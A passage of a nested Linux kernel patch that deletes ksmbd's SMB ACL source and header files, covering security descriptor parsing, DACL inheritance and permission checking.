+-	dacloffset = le32_to_cpu(pntsd->dacloffset);
+-	dacl_ptr = (struct smb_acl *)((char *)pntsd + dacloffset);
+-	ksmbd_debug(SMB,
+-		    "revision %d type 0x%x ooffset 0x%x goffset 0x%x sacloffset 0x%x dacloffset 0x%x\n",
+-		    pntsd->revision, pntsd->type, le32_to_cpu(pntsd->osidoffset),
+-		    le32_to_cpu(pntsd->gsidoffset),
+-		    le32_to_cpu(pntsd->sacloffset), dacloffset);
+-
+-	pntsd_type = le16_to_cpu(pntsd->type);
+-	if (!(pntsd_type & DACL_PRESENT)) {
+-		ksmbd_debug(SMB, "DACL_PRESENT in DACL type is not set\n");
+-		return rc;
+-	}
+-
+-	pntsd->type = cpu_to_le16(DACL_PRESENT);
+-
+-	if (pntsd->osidoffset) {
+-		rc = parse_sid(owner_sid_ptr, end_of_acl);
+-		if (rc) {
+-			pr_err("%s: Error %d parsing Owner SID\n", __func__, rc);
+-			return rc;
+-		}
+-
+-		rc = sid_to_id(user_ns, owner_sid_ptr, SIDOWNER, fattr);
+-		if (rc) {
+-			pr_err("%s: Error %d mapping Owner SID to uid\n",
+-			       __func__, rc);
+-			owner_sid_ptr = NULL;
+-		}
+-	}
+-
+-	if (pntsd->gsidoffset) {
+-		rc = parse_sid(group_sid_ptr, end_of_acl);
+-		if (rc) {
+-			pr_err("%s: Error %d mapping Owner SID to gid\n",
+-			       __func__, rc);
+-			return rc;
+-		}
+-		rc = sid_to_id(user_ns, group_sid_ptr, SIDUNIX_GROUP, fattr);
+-		if (rc) {
+-			pr_err("%s: Error %d mapping Group SID to gid\n",
+-			       __func__, rc);
+-			group_sid_ptr = NULL;
+-		}
+-	}
+-
+-	if ((pntsd_type & (DACL_AUTO_INHERITED | DACL_AUTO_INHERIT_REQ)) ==
+-	    (DACL_AUTO_INHERITED | DACL_AUTO_INHERIT_REQ))
+-		pntsd->type |= cpu_to_le16(DACL_AUTO_INHERITED);
+-	if (pntsd_type & DACL_PROTECTED)
+-		pntsd->type |= cpu_to_le16(DACL_PROTECTED);
+-
+-	if (dacloffset) {
+-		parse_dacl(user_ns, dacl_ptr, end_of_acl,
+-			   owner_sid_ptr, group_sid_ptr, fattr);
+-	}
+-
+-	return 0;
+-}
+-
+-/* Convert permission bits from mode to equivalent CIFS ACL */
+-int build_sec_desc(struct user_namespace *user_ns,
+-		   struct smb_ntsd *pntsd, struct smb_ntsd *ppntsd,
+-		   int ppntsd_size, int addition_info, __u32 *secdesclen,
+-		   struct smb_fattr *fattr)
+-{
+-	int rc = 0;
+-	__u32 offset;
+-	struct smb_sid *owner_sid_ptr, *group_sid_ptr;
+-	struct smb_sid *nowner_sid_ptr, *ngroup_sid_ptr;
+-	struct smb_acl *dacl_ptr = NULL; /* no need for SACL ptr */
+-	uid_t uid;
+-	gid_t gid;
+-	unsigned int sid_type = SIDOWNER;
+-
+-	nowner_sid_ptr = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
+-	if (!nowner_sid_ptr)
+-		return -ENOMEM;
+-
+-	uid = from_kuid(&init_user_ns, fattr->cf_uid);
+-	if (!uid)
+-		sid_type = SIDUNIX_USER;
+-	id_to_sid(uid, sid_type, nowner_sid_ptr);
+-
+-	ngroup_sid_ptr = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
+-	if (!ngroup_sid_ptr) {
+-		kfree(nowner_sid_ptr);
+-		return -ENOMEM;
+-	}
+-
+-	gid = from_kgid(&init_user_ns, fattr->cf_gid);
+-	id_to_sid(gid, SIDUNIX_GROUP, ngroup_sid_ptr);
+-
+-	offset = sizeof(struct smb_ntsd);
+-	pntsd->sacloffset = 0;
+-	pntsd->revision = cpu_to_le16(1);
+-	pntsd->type = cpu_to_le16(SELF_RELATIVE);
+-	if (ppntsd)
+-		pntsd->type |= ppntsd->type;
+-
+-	if (addition_info & OWNER_SECINFO) {
+-		pntsd->osidoffset = cpu_to_le32(offset);
+-		owner_sid_ptr = (struct smb_sid *)((char *)pntsd + offset);
+-		smb_copy_sid(owner_sid_ptr, nowner_sid_ptr);
+-		offset += 1 + 1 + 6 + (nowner_sid_ptr->num_subauth * 4);
+-	}
+-
+-	if (addition_info & GROUP_SECINFO) {
+-		pntsd->gsidoffset = cpu_to_le32(offset);
+-		group_sid_ptr = (struct smb_sid *)((char *)pntsd + offset);
+-		smb_copy_sid(group_sid_ptr, ngroup_sid_ptr);
+-		offset += 1 + 1 + 6 + (ngroup_sid_ptr->num_subauth * 4);
+-	}
+-
+-	if (addition_info & DACL_SECINFO) {
+-		pntsd->type |= cpu_to_le16(DACL_PRESENT);
+-		dacl_ptr = (struct smb_acl *)((char *)pntsd + offset);
+-		dacl_ptr->revision = cpu_to_le16(2);
+-		dacl_ptr->size = cpu_to_le16(sizeof(struct smb_acl));
+-		dacl_ptr->num_aces = 0;
+-
+-		if (!ppntsd) {
+-			set_mode_dacl(user_ns, dacl_ptr, fattr);
+-		} else {
+-			struct smb_acl *ppdacl_ptr;
+-			unsigned int dacl_offset = le32_to_cpu(ppntsd->dacloffset);
+-			int ppdacl_size, ntacl_size = ppntsd_size - dacl_offset;
+-
+-			if (!dacl_offset ||
+-			    (dacl_offset + sizeof(struct smb_acl) > ppntsd_size))
+-				goto out;
+-
+-			ppdacl_ptr = (struct smb_acl *)((char *)ppntsd + dacl_offset);
+-			ppdacl_size = le16_to_cpu(ppdacl_ptr->size);
+-			if (ppdacl_size > ntacl_size ||
+-			    ppdacl_size < sizeof(struct smb_acl))
+-				goto out;
+-
+-			set_ntacl_dacl(user_ns, dacl_ptr, ppdacl_ptr,
+-				       ntacl_size - sizeof(struct smb_acl),
+-				       nowner_sid_ptr, ngroup_sid_ptr,
+-				       fattr);
+-		}
+-		pntsd->dacloffset = cpu_to_le32(offset);
+-		offset += le16_to_cpu(dacl_ptr->size);
+-	}
+-
+-out:
+-	kfree(nowner_sid_ptr);
+-	kfree(ngroup_sid_ptr);
+-	*secdesclen = offset;
+-	return rc;
+-}
+-
+-static void smb_set_ace(struct smb_ace *ace, const struct smb_sid *sid, u8 type,
+-			u8 flags, __le32 access_req)
+-{
+-	ace->type = type;
+-	ace->flags = flags;
+-	ace->access_req = access_req;
+-	smb_copy_sid(&ace->sid, sid);
+-	ace->size = cpu_to_le16(1 + 1 + 2 + 4 + 1 + 1 + 6 + (sid->num_subauth * 4));
+-}
+-
+-int smb_inherit_dacl(struct ksmbd_conn *conn,
+-		     const struct path *path,
+-		     unsigned int uid, unsigned int gid)
+-{
+-	const struct smb_sid *psid, *creator = NULL;
+-	struct smb_ace *parent_aces, *aces;
+-	struct smb_acl *parent_pdacl;
+-	struct smb_ntsd *parent_pntsd = NULL;
+-	struct smb_sid owner_sid, group_sid;
+-	struct dentry *parent = path->dentry->d_parent;
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	int inherited_flags = 0, flags = 0, i, ace_cnt = 0, nt_size = 0, pdacl_size;
+-	int rc = 0, num_aces, dacloffset, pntsd_type, pntsd_size, acl_len, aces_size;
+-	char *aces_base;
+-	bool is_dir = S_ISDIR(d_inode(path->dentry)->i_mode);
+-
+-	pntsd_size = ksmbd_vfs_get_sd_xattr(conn, user_ns,
+-					    parent, &parent_pntsd);
+-	if (pntsd_size <= 0)
+-		return -ENOENT;
+-	dacloffset = le32_to_cpu(parent_pntsd->dacloffset);
+-	if (!dacloffset || (dacloffset + sizeof(struct smb_acl) > pntsd_size)) {
+-		rc = -EINVAL;
+-		goto free_parent_pntsd;
+-	}
+-
+-	parent_pdacl = (struct smb_acl *)((char *)parent_pntsd + dacloffset);
+-	acl_len = pntsd_size - dacloffset;
+-	num_aces = le32_to_cpu(parent_pdacl->num_aces);
+-	pntsd_type = le16_to_cpu(parent_pntsd->type);
+-	pdacl_size = le16_to_cpu(parent_pdacl->size);
+-
+-	if (pdacl_size > acl_len || pdacl_size < sizeof(struct smb_acl)) {
+-		rc = -EINVAL;
+-		goto free_parent_pntsd;
+-	}
+-
+-	aces_base = kmalloc(sizeof(struct smb_ace) * num_aces * 2, GFP_KERNEL);
+-	if (!aces_base) {
+-		rc = -ENOMEM;
+-		goto free_parent_pntsd;
+-	}
+-
+-	aces = (struct smb_ace *)aces_base;
+-	parent_aces = (struct smb_ace *)((char *)parent_pdacl +
+-			sizeof(struct smb_acl));
+-	aces_size = acl_len - sizeof(struct smb_acl);
+-
+-	if (pntsd_type & DACL_AUTO_INHERITED)
+-		inherited_flags = INHERITED_ACE;
+-
+-	for (i = 0; i < num_aces; i++) {
+-		int pace_size;
+-
+-		if (offsetof(struct smb_ace, access_req) > aces_size)
+-			break;
+-
+-		pace_size = le16_to_cpu(parent_aces->size);
+-		if (pace_size > aces_size)
+-			break;
+-
+-		aces_size -= pace_size;
+-
+-		flags = parent_aces->flags;
+-		if (!smb_inherit_flags(flags, is_dir))
+-			goto pass;
+-		if (is_dir) {
+-			flags &= ~(INHERIT_ONLY_ACE | INHERITED_ACE);
+-			if (!(flags & CONTAINER_INHERIT_ACE))
+-				flags |= INHERIT_ONLY_ACE;
+-			if (flags & NO_PROPAGATE_INHERIT_ACE)
+-				flags = 0;
+-		} else {
+-			flags = 0;
+-		}
+-
+-		if (!compare_sids(&creator_owner, &parent_aces->sid)) {
+-			creator = &creator_owner;
+-			id_to_sid(uid, SIDOWNER, &owner_sid);
+-			psid = &owner_sid;
+-		} else if (!compare_sids(&creator_group, &parent_aces->sid)) {
+-			creator = &creator_group;
+-			id_to_sid(gid, SIDUNIX_GROUP, &group_sid);
+-			psid = &group_sid;
+-		} else {
+-			creator = NULL;
+-			psid = &parent_aces->sid;
+-		}
+-
+-		if (is_dir && creator && flags & CONTAINER_INHERIT_ACE) {
+-			smb_set_ace(aces, psid, parent_aces->type, inherited_flags,
+-				    parent_aces->access_req);
+-			nt_size += le16_to_cpu(aces->size);
+-			ace_cnt++;
+-			aces = (struct smb_ace *)((char *)aces + le16_to_cpu(aces->size));
+-			flags |= INHERIT_ONLY_ACE;
+-			psid = creator;
+-		} else if (is_dir && !(parent_aces->flags & NO_PROPAGATE_INHERIT_ACE)) {
+-			psid = &parent_aces->sid;
+-		}
+-
+-		smb_set_ace(aces, psid, parent_aces->type, flags | inherited_flags,
+-			    parent_aces->access_req);
+-		nt_size += le16_to_cpu(aces->size);
+-		aces = (struct smb_ace *)((char *)aces + le16_to_cpu(aces->size));
+-		ace_cnt++;
+-pass:
+-		parent_aces = (struct smb_ace *)((char *)parent_aces + pace_size);
+-	}
+-
+-	if (nt_size > 0) {
+-		struct smb_ntsd *pntsd;
+-		struct smb_acl *pdacl;
+-		struct smb_sid *powner_sid = NULL, *pgroup_sid = NULL;
+-		int powner_sid_size = 0, pgroup_sid_size = 0, pntsd_size;
+-
+-		if (parent_pntsd->osidoffset) {
+-			powner_sid = (struct smb_sid *)((char *)parent_pntsd +
+-					le32_to_cpu(parent_pntsd->osidoffset));
+-			powner_sid_size = 1 + 1 + 6 + (powner_sid->num_subauth * 4);
+-		}
+-		if (parent_pntsd->gsidoffset) {
+-			pgroup_sid = (struct smb_sid *)((char *)parent_pntsd +
+-					le32_to_cpu(parent_pntsd->gsidoffset));
+-			pgroup_sid_size = 1 + 1 + 6 + (pgroup_sid->num_subauth * 4);
+-		}
+-
+-		pntsd = kzalloc(sizeof(struct smb_ntsd) + powner_sid_size +
+-				pgroup_sid_size + sizeof(struct smb_acl) +
+-				nt_size, GFP_KERNEL);
+-		if (!pntsd) {
+-			rc = -ENOMEM;
+-			goto free_aces_base;
+-		}
+-
+-		pntsd->revision = cpu_to_le16(1);
+-		pntsd->type = cpu_to_le16(SELF_RELATIVE | DACL_PRESENT);
+-		if (le16_to_cpu(parent_pntsd->type) & DACL_AUTO_INHERITED)
+-			pntsd->type |= cpu_to_le16(DACL_AUTO_INHERITED);
+-		pntsd_size = sizeof(struct smb_ntsd);
+-		pntsd->osidoffset = parent_pntsd->osidoffset;
+-		pntsd->gsidoffset = parent_pntsd->gsidoffset;
+-		pntsd->dacloffset = parent_pntsd->dacloffset;
+-
+-		if (pntsd->osidoffset) {
+-			struct smb_sid *owner_sid = (struct smb_sid *)((char *)pntsd +
+-					le32_to_cpu(pntsd->osidoffset));
+-			memcpy(owner_sid, powner_sid, powner_sid_size);
+-			pntsd_size += powner_sid_size;
+-		}
+-
+-		if (pntsd->gsidoffset) {
+-			struct smb_sid *group_sid = (struct smb_sid *)((char *)pntsd +
+-					le32_to_cpu(pntsd->gsidoffset));
+-			memcpy(group_sid, pgroup_sid, pgroup_sid_size);
+-			pntsd_size += pgroup_sid_size;
+-		}
+-
+-		if (pntsd->dacloffset) {
+-			struct smb_ace *pace;
+-
+-			pdacl = (struct smb_acl *)((char *)pntsd + le32_to_cpu(pntsd->dacloffset));
+-			pdacl->revision = cpu_to_le16(2);
+-			pdacl->size = cpu_to_le16(sizeof(struct smb_acl) + nt_size);
+-			pdacl->num_aces = cpu_to_le32(ace_cnt);
+-			pace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
+-			memcpy(pace, aces_base, nt_size);
+-			pntsd_size += sizeof(struct smb_acl) + nt_size;
+-		}
+-
+-		ksmbd_vfs_set_sd_xattr(conn, user_ns,
+-				       path->dentry, pntsd, pntsd_size);
+-		kfree(pntsd);
+-	}
+-
+-free_aces_base:
+-	kfree(aces_base);
+-free_parent_pntsd:
+-	kfree(parent_pntsd);
+-	return rc;
+-}
+-
+-bool smb_inherit_flags(int flags, bool is_dir)
+-{
+-	if (!is_dir)
+-		return (flags & OBJECT_INHERIT_ACE) != 0;
+-
+-	if (flags & OBJECT_INHERIT_ACE && !(flags & NO_PROPAGATE_INHERIT_ACE))
+-		return true;
+-
+-	if (flags & CONTAINER_INHERIT_ACE)
+-		return true;
+-	return false;
+-}
+-
+-int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
+-			__le32 *pdaccess, int uid)
+-{
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	struct smb_ntsd *pntsd = NULL;
+-	struct smb_acl *pdacl;
+-	struct posix_acl *posix_acls;
+-	int rc = 0, pntsd_size, acl_size, aces_size, pdacl_size, dacl_offset;
+-	struct smb_sid sid;
+-	int granted = le32_to_cpu(*pdaccess & ~FILE_MAXIMAL_ACCESS_LE);
+-	struct smb_ace *ace;
+-	int i, found = 0;
+-	unsigned int access_bits = 0;
+-	struct smb_ace *others_ace = NULL;
+-	struct posix_acl_entry *pa_entry;
+-	unsigned int sid_type = SIDOWNER;
+-	unsigned short ace_size;
+-
+-	ksmbd_debug(SMB, "check permission using windows acl\n");
+-	pntsd_size = ksmbd_vfs_get_sd_xattr(conn, user_ns,
+-					    path->dentry, &pntsd);
+-	if (pntsd_size <= 0 || !pntsd)
+-		goto err_out;
+-
+-	dacl_offset = le32_to_cpu(pntsd->dacloffset);
+-	if (!dacl_offset ||
+-	    (dacl_offset + sizeof(struct smb_acl) > pntsd_size))
+-		goto err_out;
+-
+-	pdacl = (struct smb_acl *)((char *)pntsd + le32_to_cpu(pntsd->dacloffset));
+-	acl_size = pntsd_size - dacl_offset;
+-	pdacl_size = le16_to_cpu(pdacl->size);
+-
+-	if (pdacl_size > acl_size || pdacl_size < sizeof(struct smb_acl))
+-		goto err_out;
+-
+-	if (!pdacl->num_aces) {
+-		if (!(pdacl_size - sizeof(struct smb_acl)) &&
+-		    *pdaccess & ~(FILE_READ_CONTROL_LE | FILE_WRITE_DAC_LE)) {
+-			rc = -EACCES;
+-			goto err_out;
+-		}
+-		goto err_out;
+-	}
+-
+-	if (*pdaccess & FILE_MAXIMAL_ACCESS_LE) {
+-		granted = READ_CONTROL | WRITE_DAC | FILE_READ_ATTRIBUTES |
+-			DELETE;
+-
+-		ace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
+-		aces_size = acl_size - sizeof(struct smb_acl);
+-		for (i = 0; i < le32_to_cpu(pdacl->num_aces); i++) {
+-			if (offsetof(struct smb_ace, access_req) > aces_size)
+-				break;
+-			ace_size = le16_to_cpu(ace->size);
+-			if (ace_size > aces_size)
+-				break;
+-			aces_size -= ace_size;
+-			granted |= le32_to_cpu(ace->access_req);
+-			ace = (struct smb_ace *)((char *)ace + le16_to_cpu(ace->size));
+-		}
+-
+-		if (!pdacl->num_aces)
+-			granted = GENERIC_ALL_FLAGS;
+-	}
+-
+-	if (!uid)
+-		sid_type = SIDUNIX_USER;
+-	id_to_sid(uid, sid_type, &sid);
+-
+-	ace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
+-	aces_size = acl_size - sizeof(struct smb_acl);
+-	for (i = 0; i < le32_to_cpu(pdacl->num_aces); i++) {
+-		if (offsetof(struct smb_ace, access_req) > aces_size)
+-			break;
+-		ace_size = le16_to_cpu(ace->size);
+-		if (ace_size > aces_size)
+-			break;
+-		aces_size -= ace_size;
+-
+-		if (!compare_sids(&sid, &ace->sid) ||
+-		    !compare_sids(&sid_unix_NFS_mode, &ace->sid)) {
+-			found = 1;
+-			break;
+-		}
+-		if (!compare_sids(&sid_everyone, &ace->sid))
+-			others_ace = ace;
+-
+-		ace = (struct smb_ace *)((char *)ace + le16_to_cpu(ace->size));
+-	}
+-
+-	if (*pdaccess & FILE_MAXIMAL_ACCESS_LE && found) {
+-		granted = READ_CONTROL | WRITE_DAC | FILE_READ_ATTRIBUTES |
+-			DELETE;
+-
+-		granted |= le32_to_cpu(ace->access_req);
+-
+-		if (!pdacl->num_aces)
+-			granted = GENERIC_ALL_FLAGS;
+-	}
+-
+-	if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
+-		posix_acls = get_acl(d_inode(path->dentry), ACL_TYPE_ACCESS);
+-		if (posix_acls && !found) {
+-			unsigned int id = -1;
+-
+-			pa_entry = posix_acls->a_entries;
+-			for (i = 0; i < posix_acls->a_count; i++, pa_entry++) {
+-				if (pa_entry->e_tag == ACL_USER)
+-					id = posix_acl_uid_translate(user_ns, pa_entry);
+-				else if (pa_entry->e_tag == ACL_GROUP)
+-					id = posix_acl_gid_translate(user_ns, pa_entry);
+-				else
+-					continue;
+-
+-				if (id == uid) {
+-					mode_to_access_flags(pa_entry->e_perm,
+-							     0777,
+-							     &access_bits);
+-					if (!access_bits)
+-						access_bits =
+-							SET_MINIMUM_RIGHTS;
+-					posix_acl_release(posix_acls);
+-					goto check_access_bits;
+-				}
+-			}
+-		}
+-		if (posix_acls)
+-			posix_acl_release(posix_acls);
+-	}
+-
+-	if (!found) {
+-		if (others_ace) {
+-			ace = others_ace;
+-		} else {
+-			ksmbd_debug(SMB, "Can't find corresponding sid\n");
+-			rc = -EACCES;
+-			goto err_out;
+-		}
+-	}
+-
+-	switch (ace->type) {
+-	case ACCESS_ALLOWED_ACE_TYPE:
+-		access_bits = le32_to_cpu(ace->access_req);
+-		break;
+-	case ACCESS_DENIED_ACE_TYPE:
+-	case ACCESS_DENIED_CALLBACK_ACE_TYPE:
+-		access_bits = le32_to_cpu(~ace->access_req);
+-		break;
+-	}
+-
+-check_access_bits:
+-	if (granted &
+-	    ~(access_bits | FILE_READ_ATTRIBUTES | READ_CONTROL | WRITE_DAC | DELETE)) {
+-		ksmbd_debug(SMB, "Access denied with winACL, granted : %x, access_req : %x\n",
+-			    granted, le32_to_cpu(ace->access_req));
+-		rc = -EACCES;
+-		goto err_out;
+-	}
+-
+-	*pdaccess = cpu_to_le32(granted);
+-err_out:
+-	kfree(pntsd);
+-	return rc;
+-}
+-
+-int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+-		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
+-		 bool type_check)
+-{
+-	int rc;
+-	struct smb_fattr fattr = {{0}};
+-	struct inode *inode = d_inode(path->dentry);
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	struct iattr newattrs;
+-
+-	fattr.cf_uid = INVALID_UID;
+-	fattr.cf_gid = INVALID_GID;
+-	fattr.cf_mode = inode->i_mode;
+-
+-	rc = parse_sec_desc(user_ns, pntsd, ntsd_len, &fattr);
+-	if (rc)
+-		goto out;
+-
+-	newattrs.ia_valid = ATTR_CTIME;
+-	if (!uid_eq(fattr.cf_uid, INVALID_UID)) {
+-		newattrs.ia_valid |= ATTR_UID;
+-		newattrs.ia_uid = fattr.cf_uid;
+-	}
+-	if (!gid_eq(fattr.cf_gid, INVALID_GID)) {
+-		newattrs.ia_valid |= ATTR_GID;
+-		newattrs.ia_gid = fattr.cf_gid;
+-	}
+-	newattrs.ia_valid |= ATTR_MODE;
+-	newattrs.ia_mode = (inode->i_mode & ~0777) | (fattr.cf_mode & 0777);
+-
+-	ksmbd_vfs_remove_acl_xattrs(user_ns, path->dentry);
+-	/* Update posix acls */
+-	if (IS_ENABLED(CONFIG_FS_POSIX_ACL) && fattr.cf_dacls) {
+-		rc = set_posix_acl(user_ns, inode,
+-				   ACL_TYPE_ACCESS, fattr.cf_acls);
+-		if (rc < 0)
+-			ksmbd_debug(SMB,
+-				    "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
+-				    rc);
+-		if (S_ISDIR(inode->i_mode) && fattr.cf_dacls) {
+-			rc = set_posix_acl(user_ns, inode,
+-					   ACL_TYPE_DEFAULT, fattr.cf_dacls);
+-			if (rc)
+-				ksmbd_debug(SMB,
+-					    "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
+-					    rc);
+-		}
+-	}
+-
+-	inode_lock(inode);
+-	rc = notify_change(user_ns, path->dentry, &newattrs, NULL);
+-	inode_unlock(inode);
+-	if (rc)
+-		goto out;
+-
+-	/* Check it only calling from SD BUFFER context */
+-	if (type_check && !(le16_to_cpu(pntsd->type) & DACL_PRESENT))
+-		goto out;
+-
+-	if (test_share_config_flag(tcon->share_conf, KSMBD_SHARE_FLAG_ACL_XATTR)) {
+-		/* Update WinACL in xattr */
+-		ksmbd_vfs_remove_sd_xattrs(user_ns, path->dentry);
+-		ksmbd_vfs_set_sd_xattr(conn, user_ns,
+-				       path->dentry, pntsd, ntsd_len);
+-	}
+-
+-out:
+-	posix_acl_release(fattr.cf_acls);
+-	posix_acl_release(fattr.cf_dacls);
+-	mark_inode_dirty(inode);
+-	return rc;
+-}
+-
+-void ksmbd_init_domain(u32 *sub_auth)
+-{
+-	int i;
+-
+-	memcpy(&server_conf.domain_sid, &domain, sizeof(struct smb_sid));
+-	for (i = 0; i < 3; ++i)
+-		server_conf.domain_sid.sub_auth[i + 1] = cpu_to_le32(sub_auth[i]);
+-}
+diff --git a/fs/ksmbd/smbacl.h b/fs/ksmbd/smbacl.h
+deleted file mode 100644
+index 618f2e0236b31..0000000000000
+--- a/fs/ksmbd/smbacl.h
++++ /dev/null
+@@ -1,238 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1+ */
+-/*
+- *   Copyright (c) International Business Machines  Corp., 2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *   Modified by Namjae Jeon (linkinjeon@kernel.org)
+- */
+-
+-#ifndef _SMBACL_H
+-#define _SMBACL_H
+-
+-#include <linux/fs.h>
+-#include <linux/namei.h>
+-#include <linux/posix_acl.h>
+-#include <linux/mnt_idmapping.h>
+-
+-#include "mgmt/tree_connect.h"
+-
+-#define NUM_AUTHS (6)	/* number of authority fields */
+-#define SID_MAX_SUB_AUTHORITIES (15) /* max number of sub authority fields */
+-
+-/*
+- * ACE types - see MS-DTYP 2.4.4.1
+- */
+-enum {
+-	ACCESS_ALLOWED,
+-	ACCESS_DENIED,
+-};
+-
+-/*
+- * Security ID types
+- */
+-enum {
+-	SIDOWNER = 1,
+-	SIDGROUP,
+-	SIDCREATOR_OWNER,
+-	SIDCREATOR_GROUP,
+-	SIDUNIX_USER,
+-	SIDUNIX_GROUP,
+-	SIDNFS_USER,
+-	SIDNFS_GROUP,
+-	SIDNFS_MODE,
+-};
+-
+-/* Revision for ACLs */
+-#define SD_REVISION	1
+-
+-/* Control flags for Security Descriptor */
+-#define OWNER_DEFAULTED		0x0001
+-#define GROUP_DEFAULTED		0x0002
+-#define DACL_PRESENT		0x0004
+-#define DACL_DEFAULTED		0x0008
+-#define SACL_PRESENT		0x0010
+-#define SACL_DEFAULTED		0x0020
+-#define DACL_TRUSTED		0x0040
+-#define SERVER_SECURITY		0x0080
+-#define DACL_AUTO_INHERIT_REQ	0x0100
+-#define SACL_AUTO_INHERIT_REQ	0x0200
+-#define DACL_AUTO_INHERITED	0x0400
+-#define SACL_AUTO_INHERITED	0x0800
+-#define DACL_PROTECTED		0x1000
+-#define SACL_PROTECTED		0x2000
+-#define RM_CONTROL_VALID	0x4000
+-#define SELF_RELATIVE		0x8000
+-
+-/* ACE types - see MS-DTYP 2.4.4.1 */
+-#define ACCESS_ALLOWED_ACE_TYPE 0x00
+-#define ACCESS_DENIED_ACE_TYPE  0x01
+-#define SYSTEM_AUDIT_ACE_TYPE   0x02
+-#define SYSTEM_ALARM_ACE_TYPE   0x03
+-#define ACCESS_ALLOWED_COMPOUND_ACE_TYPE 0x04
+-#define ACCESS_ALLOWED_OBJECT_ACE_TYPE  0x05
+-#define ACCESS_DENIED_OBJECT_ACE_TYPE   0x06
+-#define SYSTEM_AUDIT_OBJECT_ACE_TYPE    0x07
+-#define SYSTEM_ALARM_OBJECT_ACE_TYPE    0x08
+-#define ACCESS_ALLOWED_CALLBACK_ACE_TYPE 0x09
+-#define ACCESS_DENIED_CALLBACK_ACE_TYPE 0x0A
+-#define ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE 0x0B
+-#define ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE  0x0C
+-#define SYSTEM_AUDIT_CALLBACK_ACE_TYPE  0x0D
+-#define SYSTEM_ALARM_CALLBACK_ACE_TYPE  0x0E /* Reserved */
+-#define SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE 0x0F
+-#define SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE 0x10 /* reserved */
+-#define SYSTEM_MANDATORY_LABEL_ACE_TYPE 0x11
+-#define SYSTEM_RESOURCE_ATTRIBUTE_ACE_TYPE 0x12
+-#define SYSTEM_SCOPED_POLICY_ID_ACE_TYPE 0x13
+-
+-/* ACE flags */
+-#define OBJECT_INHERIT_ACE		0x01
+-#define CONTAINER_INHERIT_ACE		0x02
+-#define NO_PROPAGATE_INHERIT_ACE	0x04
+-#define INHERIT_ONLY_ACE		0x08
+-#define INHERITED_ACE			0x10
+-#define SUCCESSFUL_ACCESS_ACE_FLAG	0x40
+-#define FAILED_ACCESS_ACE_FLAG		0x80
+-
+-/*
+- * Maximum size of a string representation of a SID:
+- *
+- * The fields are unsigned values in decimal. So:
+- *
+- * u8:  max 3 bytes in decimal
+- * u32: max 10 bytes in decimal
+- *
+- * "S-" + 3 bytes for version field + 15 for authority field + NULL terminator
+- *
+- * For authority field, max is when all 6 values are non-zero and it must be
+- * represented in hex. So "-0x" + 12 hex digits.
+- *
+- * Add 11 bytes for each subauthority field (10 bytes each + 1 for '-')
+- */
+-#define SID_STRING_BASE_SIZE (2 + 3 + 15 + 1)
+-#define SID_STRING_SUBAUTH_SIZE (11) /* size of a single subauth string */
+-
+-#define DOMAIN_USER_RID_LE	cpu_to_le32(513)
+-
+-struct ksmbd_conn;
+-
+-struct smb_ntsd {
+-	__le16 revision; /* revision level */
+-	__le16 type;
+-	__le32 osidoffset;
+-	__le32 gsidoffset;
+-	__le32 sacloffset;
+-	__le32 dacloffset;
+-} __packed;
+-
+-struct smb_sid {
+-	__u8 revision; /* revision level */
+-	__u8 num_subauth;
+-	__u8 authority[NUM_AUTHS];
+-	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
+-} __packed;
+-
+-/* size of a struct cifs_sid, sans sub_auth array */
+-#define CIFS_SID_BASE_SIZE (1 + 1 + NUM_AUTHS)
+-
+-struct smb_acl {
+-	__le16 revision; /* revision level */
+-	__le16 size;
+-	__le32 num_aces;
+-} __packed;
+-
+-struct smb_ace {
+-	__u8 type;
+-	__u8 flags;
+-	__le16 size;
+-	__le32 access_req;
+-	struct smb_sid sid; /* ie UUID of user or group who gets these perms */
+-} __packed;
+-
+-struct smb_fattr {
+-	kuid_t	cf_uid;
+-	kgid_t	cf_gid;
+-	umode_t	cf_mode;
+-	__le32 daccess;
+-	struct posix_acl *cf_acls;
+-	struct posix_acl *cf_dacls;
+-};
+-
+-struct posix_ace_state {
+-	u32 allow;
+-	u32 deny;
+-};
+-
+-struct posix_user_ace_state {
+-	union {
+-		kuid_t uid;
+-		kgid_t gid;
+-	};
+-	struct posix_ace_state perms;
+-};
+-
+-struct posix_ace_state_array {
+-	int n;
+-	struct posix_user_ace_state aces[];
+-};
+-
+-/*
+- * while processing the nfsv4 ace, this maintains the partial permissions
+- * calculated so far:
+- */
+-
+-struct posix_acl_state {
+-	struct posix_ace_state owner;
+-	struct posix_ace_state group;
+-	struct posix_ace_state other;
+-	struct posix_ace_state everyone;
+-	struct posix_ace_state mask; /* deny unused in this case */
+-	struct posix_ace_state_array *users;
+-	struct posix_ace_state_array *groups;
+-};
+-
+-int parse_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
+-		   int acl_len, struct smb_fattr *fattr);
+-int build_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
+-		   struct smb_ntsd *ppntsd, int ppntsd_size, int addition_info,
+-		   __u32 *secdesclen, struct smb_fattr *fattr);
+-int init_acl_state(struct posix_acl_state *state, int cnt);
+-void free_acl_state(struct posix_acl_state *state);
+-void posix_state_to_acl(struct posix_acl_state *state,
+-			struct posix_acl_entry *pace);
+-int compare_sids(const struct smb_sid *ctsid, const struct smb_sid *cwsid);
